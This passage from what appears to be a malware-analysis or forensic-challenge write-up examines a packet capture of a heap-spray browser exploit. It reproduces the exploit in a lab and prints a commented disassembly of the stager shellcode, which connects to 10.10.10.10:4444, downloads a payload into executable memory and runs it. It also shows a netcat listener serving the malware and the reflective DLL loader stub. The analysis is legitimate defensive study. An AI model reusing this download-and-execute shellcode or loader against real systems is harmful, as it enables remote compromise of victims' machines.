7.a Initial sequence number changed every [3] packet(s) and every [2.3] second(s).


Ip Id   Change delay    Packets count   Indexes
[554]   [0.467954]              [1]     [1568].
[555]   [0.437498]              [1]     [1570].
[556]   [0.000668]              [1]     [1572].
[557]   [0.546208]              [1]     [1574].
[558]   [0.546858]              [1]     [1576].
[559]   [0.000642]              [1]     [1578].
[560]   [0.546246]              [1]     [1580].
[561]   [0.546853]              [1]     [1582].
[562]   [0.000674]              [1]     [1584].
[563]   [0.546229]              [1]     [1586].
[564]   [0.547251]              [1]     [1588].
[565]   [0.000264]              [1]     [1590].
[566]   [0.436851]              [1]     [1592].
[567]   [0.546878]              [1]     [1594].
[568]   [6.789448]              [1]     [1596].
[569]   [0.538670]              [1]     [1598].
[570]   [0.546852]              [1]     [1600].
[571]   [0.000662]              [1]     [1602].
[572]   [0.546239]              [1]     [1604].
[573]   [0.546849]              [1]     [1606].
[574]   [0.000667]              [1]     [1608].
[575]   [0.546557]              [1]     [1610].
[576]   [0.437170]              [1]     [1612].
[577]   [0.000657]              [1]     [1614].
[578]   [0.546227]              [1]     [1616].
[579]   [0.437489]              [1]     [1618].
[580]   [0.000658]              [1]     [1620].
[581]   [0.546193]              [1]     [1622].
[582]   [0.437524]              [1]     [1624].
[583]   [6.775159]              [1]     [1626].
[584]   [0.334190]              [1]     [1628].
[585]   [0.546891]              [1]     [1630].
[586]   [0.000649]              [1]     [1632].
[587]   [0.546229]              [1]     [1634].
[588]   [0.546851]              [1]     [1636].
[589]   [0.000658]              [1]     [1638].
[590]   [0.546234]              [1]     [1640].
[591]   [0.437480]              [1]     [1642].
[592]   [0.000653]              [1]     [1644].
[593]   [0.546241]              [1]     [1646].
[594]   [0.437478]              [1]     [1648].
[595]   [0.000653]              [1]     [1650].
[596]   [0.546249]              [1]     [1652].
[597]   [not availabe]          [1]     [1654].

7.b Ip Identification changed every [1] packet(s) and every [0.7] second(s).


Source port     Change port     Packets count   Indexes
[1042]          [11.960522]             [15]    [1568,1596,1594,1592,1590,1588,1586,1584,1582,1570,1572,1574,1576,1578,1580].
[1043]          [11.907573]             [15]    [1616,1618,1620,1622,1624,1626,1614,1612,1610,1598,1600,1602,1604,1606,1608].
[1044]          [not availabe]          [14]    [1652,1650,1648,1646,1644,1642,1640,1638,1636,1634,1632,1630,1628,1654].

7.c Source port changed every [15] packet(s) and every [11.9] second(s).


8. Port 4445 connection start at index [1658] and time [123.7] second(s).


10. Port 4445 connection end at index [2552] and time [198.4] second(s).

Finished


From this packet we find out that the computer with ip: 10.10.10.70 has name SAUCYDEV.
From the ServerType tag we obtain the following information:
    Workstation: This is a Workstation
    Server: This is a Server
    NT Workstation: This is an NT Workstation


Examining the downloader:

For examining the downloader and then the mallware I've set up a vmware virtual machine with Windows XP SP2. Also, I've installed IDA and Wireshark and disabled automatic updates because WinXP SP 2 is vulnerable.

First thing to do is to test if the exploit works on our lab machine.
    Copy the extracted HTML and GIF files on the virtual machine. Copy also the unobfuscated version of the html.
    Start wireshark to capture packets.
    Open the infected html into IE (Allow blocked content).
    We will see some SYN packets to 10.10.10.10 on port 4444 just like in the capture. Thus, the exploit works fine.
    Next thing to do is to modify the payload so that we can add a breakpoint without interfering with the downloader. A way to do this is to add %ucccc at the start of the payload. This will set up a software breakpoint exception. (The "Stop program" checkbox must be checked in the "Debugger -> Debugger Options -> Edit Exception -> Edit... -> 80000003 EXCEPTION_BREAKPOINT" menu)



At the time the breakpoint is reached the callstack looks like this:

debug206  <---- start of the payload. The decryption of the code starts here
7D6D53A8 mshtml.dll  <----- here is a call that points to 0x0c,0x0d heapspray data
7D639266 mshtml.dll  
7D51AA30 mshtml.dll  
7D51A8CA mshtml.dll  
75C56BF8 jscript.dll
75C631C4 jscript.dll
75C576D2 jscript.dll
75C61AAE jscript.dll
75C54D2F jscript.dll
75C56559 jscript.dll
75C57545 jscript.dll
75C5740F jscript.dll
75C5678B jscript.dll
7D520177 mshtml.dll  
7D52007E mshtml.dll  
7D51FA34 mshtml.dll  
7D51F9F9 mshtml.dll  
77D48706 user32.dll  
77D487E6 user32.dll  
77D489A0 user32.dll  
77D489E3 user32.dll  
75FA6F67 browseui.dll
75FAE8AE browseui.dll
75FAEA14 browseui.dll
75FAECB8 browseui.dll
777E6BA5 shdocvw.dll
0040236D IEXPLORE.EXE
0040243F IEXPLORE.EXE
7C816D4C kernel32.dll



We will see the following code:

-------------Heapspray---------------
debug207:0C13001A 0D                db  0Dh
debug207:0C13001B 0C                db  0Ch
debug207:0C13001C 0D                db  0Dh
debug207:0C13001D 0C                db  0Ch
debug207:0C13001E 0D                db  0Dh
debug207:0C13001F 0C                db  0Ch
debug207:0C130020 0D                db  0Dh
debug207:0C130021 0C                db  0Ch
debug207:0C130022 0D                db  0Dh
debug207:0C130023 0C                db  0Ch

--------Our software breakpoint---------
debug207:0C130024 CC                db 0CCh ; ¦
debug207:0C130025 CC                db 0CCh ; ¦

--------The begining of the payload---------
debug207:0C130026 9B                wait
debug207:0C130027 0D B8 2C 70 6B    or      eax, 6B702CB8h
debug207:0C13002C D4 1D             aam     1Dh
debug207:0C13002E B3 1C             mov     bl, 1Ch
debug207:0C130030 B7 08             mov     bh, 8
debug207:0C130032 F5                cmc
debug207:0C130033 39 FD             cmp     ebp, edi
debug207:0C130035 3F                aas
debug207:0C130036 B4 99             mov     ah, 99h
debug207:0C130038 8D 92 42 04 4E 02 lea     edx, unk_24E0442[edx]
debug207:0C13003E E2 3C             loop    near ptr loc_C13007B+1
debug207:0C130040 93                xchg    eax, ebx
debug207:0C130041 B1 BA             mov     cl, 0BAh
debug207:0C130043 2D 76 37 0C 43    sub     eax, 430C3776h
debug207:0C130048 B6 A8             mov     dh, 0A8h
debug207:0C13004A 35 97 7E 24 B2    xor     eax, 0B2247E97h
debug207:0C13004F 77 46             ja      short loc_C130097
debug207:0C130051 34 BE             xor     al, 0BEh
debug207:0C130053 91                xchg    eax, ecx
debug207:0C130054 48                dec     eax
debug207:0C130055 41                inc     ecx
debug207:0C130056 22 F8             and     bh, al
debug207:0C130058 A9 99 7D 78 66    test    eax, 66787D99h
debug207:0C13005D B9 BA 43 7C 4B    mov     ecx, 4B7C43BAh

When the execution flow reaches the payload, the EAX, EBX, ECX contains the following:
    EAX = 0x0D0C0DCD
    EBC = 0x0C0D0C0D
    ECX = 0x0C0D0C0D
    
The download code is decrypted by obfuscated code (decrypts and execute near jump to decrypted_code_address_address+1

Here is a simple decryption routine:

debug207:0C1302DB                   Decrypt_01:
debug207:0C1302DB 83 E8 FC          sub     eax, 0FFFFFFFCh   ; next 4 bytes
debug207:0C1302DE 31 68 13          xor     [eax+13h], ebp    ; eax+13h -> the address to be decoded
debug207:0C1302E1 03 68 13          add     ebp, [eax+13h]
debug207:0C1302E4 E2                loop    Decrypt_01

debug207:0C1302E5 F5                cmc
debug207:0C1302E6 81 C4 54 F2       add     esp, 0FFFFF254h



Here is the full "download code" decrypted with detalied comments:



debug206:0C1902ED call    Load_ws2_32_dll
debug206:0C1902F2
debug206:0C1902F2 ; =============== S U B R O U T I N E =======================================
debug206:0C1902F2
debug206:0C1902F2
debug206:0C1902F2 SearchAndCall proc near
debug206:0C1902F2
debug206:0C1902F2 var_4= dword ptr -4
debug206:0C1902F2
debug206:0C1902F2 pusha                                   ; Begin SearchForFunction using some Hash Algo (xor 0x0D)
debug206:0C1902F3 mov     ebp, esp
debug206:0C1902F5 xor     edx, edx
debug206:0C1902F7 mov     edx, fs:[edx+30h]               ; get a pointer to the PEB
debug206:0C1902FB mov     edx, [edx+0Ch]                  ; get PEB->Ldr
debug206:0C1902FE mov     edx, [edx+14h]                  ; get the first module from the InMemoryOrder module list
debug206:0C190301
debug206:0C190301 GetNextModule_PEB:                      ; CODE XREF: SearchAndCall+87j
debug206:0C190301 mov     esi, [edx+28h]                  ; get pointer to modules name (unicode string)
debug206:0C190304 movzx   ecx, word ptr [edx+26h]         ; loop size
debug206:0C190308 xor     edi, edi
debug206:0C19030A
debug206:0C19030A NextByteFromName:                       ; CODE XREF: SearchAndCall+26j
debug206:0C19030A xor     eax, eax
debug206:0C19030C lodsb                                   ; read in the next byte of the name
debug206:0C19030D cmp     al, 'a'                         ; lowercase?
debug206:0C19030F jl      short NotLowerCase              ; go and add to hash
debug206:0C190311 sub     al, 20h                         ; to uppercase
debug206:0C190313
debug206:0C190313 NotLowerCase:                           ; CODE XREF: SearchAndCall+1Dj
debug206:0C190313 ror     edi, 0Dh                        ; Rotate right (used for hash)
debug206:0C190316 add     edi, eax                        ; add the byte of the name to the hash
debug206:0C190318 loop    NextByteFromName
debug206:0C19031A push    edx                             ; edx = the module
debug206:0C19031B push    edi                             ; edi = the hash
debug206:0C19031C mov     edx, [edx+10h]                  ; get this modules base address
debug206:0C19031F mov     eax, [edx+3Ch]
debug206:0C190322 add     eax, edx
debug206:0C190324 mov     eax, [eax+78h]
debug206:0C190327 test    eax, eax
debug206:0C190329 jz      short loc_C190375
debug206:0C19032B add     eax, edx
debug206:0C19032D push    eax
debug206:0C19032E mov     ecx, [eax+18h]                  ; exports count
debug206:0C190331 mov     ebx, [eax+20h]                  ; address of names
debug206:0C190334 add     ebx, edx
debug206:0C190336
debug206:0C190336 NextFunction:                           ; CODE XREF: SearchAndCall+60j
debug206:0C190336 jecxz   short NextModule
debug206:0C190338 dec     ecx
debug206:0C190339 mov     esi, [ebx+ecx*4]
debug206:0C19033C add     esi, edx
debug206:0C19033E xor     edi, edi
debug206:0C190340
debug206:0C190340 FunctionNameHash:                       ; CODE XREF: SearchAndCall+58j
debug206:0C190340 xor     eax, eax
debug206:0C190342 lodsb
debug206:0C190343 ror     edi, 0Dh                        ; Rotate right (used for hash)
debug206:0C190346 add     edi, eax                        ; add to hash (edi)
debug206:0C190348 cmp     al, ah                          ; check for null termination
debug206:0C190348                                         ; ah is always 0x00
debug206:0C19034A jnz     short FunctionNameHash
debug206:0C19034C add     edi, [ebp-8]                    ; Add ModuleNameHash to FunctionNameHash
debug206:0C19034F cmp     edi, [ebp+24h]
debug206:0C190352 jnz     short NextFunction
debug206:0C190354 pop     eax
debug206:0C190355 mov     ebx, [eax+24h]
debug206:0C190358 add     ebx, edx
debug206:0C19035A mov     cx, [ebx+ecx*2]
debug206:0C19035E mov     ebx, [eax+1Ch]
debug206:0C190361 add     ebx, edx
debug206:0C190363 mov     eax, [ebx+ecx*4]
debug206:0C190366 add     eax, edx                        ; eax = searched function address
debug206:0C190368 mov     [esp+28h+var_4], eax            ; save that address
debug206:0C19036C pop     ebx
debug206:0C19036D pop     ebx
debug206:0C19036E popa
debug206:0C19036F pop     ecx
debug206:0C190370 pop     edx                             ; discard the searched hash from stack
debug206:0C190370                                         ; now the stack contains function parameters
debug206:0C190371 push    ecx                             ; ECX contains the return address
debug206:0C190372 jmp     eax                             ; Simulates a call to required function
debug206:0C190372                                         ; EAX contains the function address
debug206:0C190372                                         ; This executes a jump to eax (start of the function)
debug206:0C190372                                         ; The stack contains the return address
debug206:0C190374 ; ---------------------------------------------------------------------------
debug206:0C190374
debug206:0C190374 NextModule:                             ; CODE XREF: SearchAndCall:NextFunctionj
debug206:0C190374 pop     eax
debug206:0C190375
debug206:0C190375 loc_C190375:                            ; CODE XREF: SearchAndCall+37j
debug206:0C190375 pop     edi
debug206:0C190376 pop     edx
debug206:0C190377 mov     edx, [edx]                      ; restore address of next module in edx
debug206:0C190379 jmp     short GetNextModule_PEB
debug206:0C190379 SearchAndCall endp ; sp-analysis failed
debug206:0C190379
debug206:0C19037B ; ---------------------------------------------------------------------------
debug206:0C19037B
debug206:0C19037B Load_ws2_32_dll:                        ; CODE XREF: debug206:0C1902EDp
debug206:0C19037B pop     ebp                             
debug206:0C19037C push    '23'                            ; creates "ws2_32.dll" string in the stack
debug206:0C190381 push    '_2sw'
debug206:0C190386 push    esp                             ; esp = 0 (null terminate the string)
debug206:0C190387 push    offset off_726774C              ; hash(UPPER(kernel32.dll)) + hash(LoadLibrary)
debug206:0C19038C
debug206:0C19038C ; =============== S U B R O U T I N E =======================================
debug206:0C19038C
debug206:0C19038C
debug206:0C19038C sub_C19038C proc near
debug206:0C19038C call    ebp                             ; LoadLibrary("ws2_32.dll")
debug206:0C19038E mov     eax, 190h
debug206:0C190393 sub     esp, eax
debug206:0C190395 push    esp
debug206:0C190396 push    eax
debug206:0C190397 push    6B8029h
debug206:0C19039C call    ebp                             ; WSASocketA (AF_INET, SOCK_STREAM, 0,0,0,0)
debug206:0C19039E push    eax
debug206:0C19039F push    eax
debug206:0C1903A0 push    eax
debug206:0C1903A1 push    eax
debug206:0C1903A2 inc     eax
debug206:0C1903A3 push    eax
debug206:0C1903A4 inc     eax
debug206:0C1903A5 push    eax
debug206:0C1903A6 push    0E0DF0FEAh
debug206:0C1903AB call    ebp                             ; Create a WSASocketA
debug206:0C1903AD xchg    eax, edi                        ; move the socket to edi
debug206:0C1903AE push    5                               ; Connection retry count (0x05)
debug206:0C1903B0 push    offset off_A0A0A0A              ; server addres in Hex (10.10.10.10)
debug206:0C1903B5 push    5C110002h                       ; 0x110C = 4444 - The port to connect
debug206:0C1903B5                                         ; 0x0002 = 2 -> AF_INET (internetwork: UDP, TCP, etc)
debug206:0C1903BA mov     esi, esp
debug206:0C1903BC
debug206:0C1903BC Connect:                                ; CODE XREF: sub_C19038C+42j
debug206:0C1903BC push    10h                             ; sockaddr structure size
debug206:0C1903BE push    esi                             ; esi = pointer to address family, port and IP (sockaddr structure)
debug206:0C1903BF push    edi                             ; edi contains the socket() oject ref
debug206:0C1903C0 push    6174A599h
debug206:0C1903C5 call    ebp                             ; connect to 0x0A0A0A0A (10.10.10.10)
debug206:0C1903C7 test    eax, eax                        ; Check connect status (eax = 0x00 -> success)
debug206:0C1903C9 jz      short ConnectSuccess
debug206:0C1903CB dec     dword ptr [esi+8]               ; decrement retry count
debug206:0C1903CE jnz     short Connect
debug206:0C1903D0 push    56A2B5F0h
debug206:0C1903D5 call    ebp
debug206:0C1903D7
debug206:0C1903D7 ConnectSuccess:                         ; CODE XREF: sub_C19038C+3Dj
debug206:0C1903D7 push    0                               ; flags - MSG_PEEK
debug206:0C1903D9 push    4                               ; download length
debug206:0C1903DB push    esi                             ; sockaddr pointer
debug206:0C1903DC push    edi                             ; socket
debug206:0C1903DD push    5FC8D902h                       ; hash(ws2_32.dll)+ hash(recv)
debug206:0C1903E2 call    ebp                             ; call ws2_32->recv
debug206:0C1903E4 mov     esi, [esi]                      ; esi contains the received bytes (len =4)
debug206:0C1903E4                                         ; the content is converted into an integer (748032b)
debug206:0C1903E4                                         ; in this case is the len of the mallware
debug206:0C1903E4                                         ; that will be downloaded
debug206:0C1903E4                                         ;
debug206:0C1903E6 push    PAGE_EXECUTE_READWRITE
debug206:0C1903E8 push    MEM_COMMIT
debug206:0C1903ED push    esi                             ; download length (0x000B6A00)
debug206:0C1903EE push    0                               ; the system determines where to allocate the region
debug206:0C1903F0 push    0E553A458h
debug206:0C1903F5 call    ebp                             ; Kernel32->VirtualAlloc (Allocate memory for mallware)
debug206:0C1903F7 xchg    eax, ebx
debug206:0C1903F8 push    ebx                             ; the address of the allocated memory
debug206:0C1903F8                                         ; also used for retn at debug206:0C19040D
debug206:0C1903F8                                         ; the retn will jump at that address
debug206:0C1903F9
debug206:0C1903F9 download_remaining:                     ; CODE XREF: sub_C19038C+7Fj
debug206:0C1903F9 push    0                               ; flags - MSG_PEEK
debug206:0C1903FB push    esi                             ; download lenght
debug206:0C1903FC push    ebx                             ; memory address
debug206:0C1903FD push    edi                             ; socket
debug206:0C1903FE push    5FC8D902h
debug206:0C190403 call    ebp
debug206:0C190405 add     ebx, eax
debug206:0C190407 sub     esi, eax                        ; remaining_length = remaining_length - received_length
debug206:0C190409 test    esi, esi                        ; if esi = 0 (remaining_length =0) goto retn
debug206:0C19040B jnz     short download_remaining        ; loop
debug206:0C19040D retn                                    ; jump to downloaded code (MZ HEADER)
debug206:0C19040D sub_C19038C endp ; sp-analysis failed
debug206:0C19040D



That's all from debugging the downloader.

If we want to debug the malware (downloaded code) itself we must work with another cool tool name netcat (for linux: http://netcat.sourceforge.net/ , I used windows version: http://www.downloadnetcat.com/). We can create a virtual network with subnet address 10.10.10.0 and mask 255.255.255.0 and add a server with ip 10.10.10.10. A more simple way is to use the same virtual machine and add another ip (10.10.10.10) to the network interface. In this way, the downloader can connect to it. Using netcat we can create a server on port 4444 and this way the virtual machine is both the malware server and client. We can use netcat to autoanswer to the client using redirection operator "<" as netcat input.
If we have the malware saved from the pcap file, we can use it as an input data for the netcat server. Thus, we can download and analyze the malware in the IDA from our lab.
Below is the netcat command for starting a server that responds with the file "data_mod" containing the length of the malware (first 4 bytes) and the malware code:
 
C:\Work\nc111nt>nc -l -p 4444 -vv < c:\work\data_mod.txt
listening on [any] 4444 ...
connect to [10.10.10.10] from TEST-C77F245D2A [10.10.10.10] 1207

Here is the pathed MZ header of the downloaded mallware DLL:

debug206:015E0000                         ; Segment type: Pure code
debug206:015E0000                         ; Segment permissions: Read/Write/Execute
debug206:015E0000                          segment byte public 'CODE' use32
debug206:015E0000                         assume cs:
debug206:015E0000                         ;org 15E0000h
debug206:015E0000                         assume es:debug007, ss:debug007, ds:debug007, fs:debug007, gs:debug007
debug206:015E0000 4D                      dec     ebp                             ; MZ header
debug206:015E0001 5A                      pop     edx
debug206:015E0002 E8 00 00 00 00          call    $+5                             ; eip+=5
debug206:015E0007 5B                      pop     ebx
debug206:015E0008 52                      push    edx
debug206:015E0009 45                      inc     ebp
debug206:015E000A 55                      push    ebp
debug206:015E000B 89 E5                   mov     ebp, esp
debug206:015E000D 81 C3 CB 11 00 00       add     ebx, 11CBh
debug206:015E0013 FF D3                   call    ebx                             ; call ReflectiveLoader
debug206:015E0015 89 C3                   mov     ebx, eax
debug206:015E0017 57                      push    edi
debug206:015E0018 68 04 00 00 00          push    4
debug206:015E001D 50                      push    eax
debug206:015E001E FF D0                   call    eax
debug206:015E0020 68 F0 B5 A2 56          push    56A2B5F0h
debug206:015E0025 68 05 00 00 00          push    5
debug206:015E002A 50                      push    eax
debug206:015E002B FF D3                   call    ebx

After some google search i've found out that this is the Reflective DLL Injection. This method is used for a while by metasploit framework. Here is the method's url: http://www.harmonysecurity.com/ReflectiveDllInjection.html
The following code looks just like ours:

dec ebp ; M
pop edx ; Z
call 0 ; call next instruction
pop ebx ; get our location (+7)
push edx ; push edx back
inc ebp ; restore ebp
push ebp ; save ebp
mov ebp, esp ; setup fresh stack frame
add ebx, 0x???????? ; add offset to ReflectiveLoader
call ebx ; call ReflectiveLoader
mov ebx, eax ; save DllMain for second call
push edi ; our socket
push 0x4 ; signal we have attached
push eax ; some value for hinstance
call eax ; call DllMain( somevalue,DLL_METASPLOIT_ATTACH, socket )
push 0x???????? ; our EXITFUNC placeholder
push 0x5 ; signal we have detached
push eax ; some value for hinstance
call ebx ; call DllMain( somevalue,DLL_METASPLOIT_DETACH, exitfunk )
; we only return if we don't set a valid EXITFUNC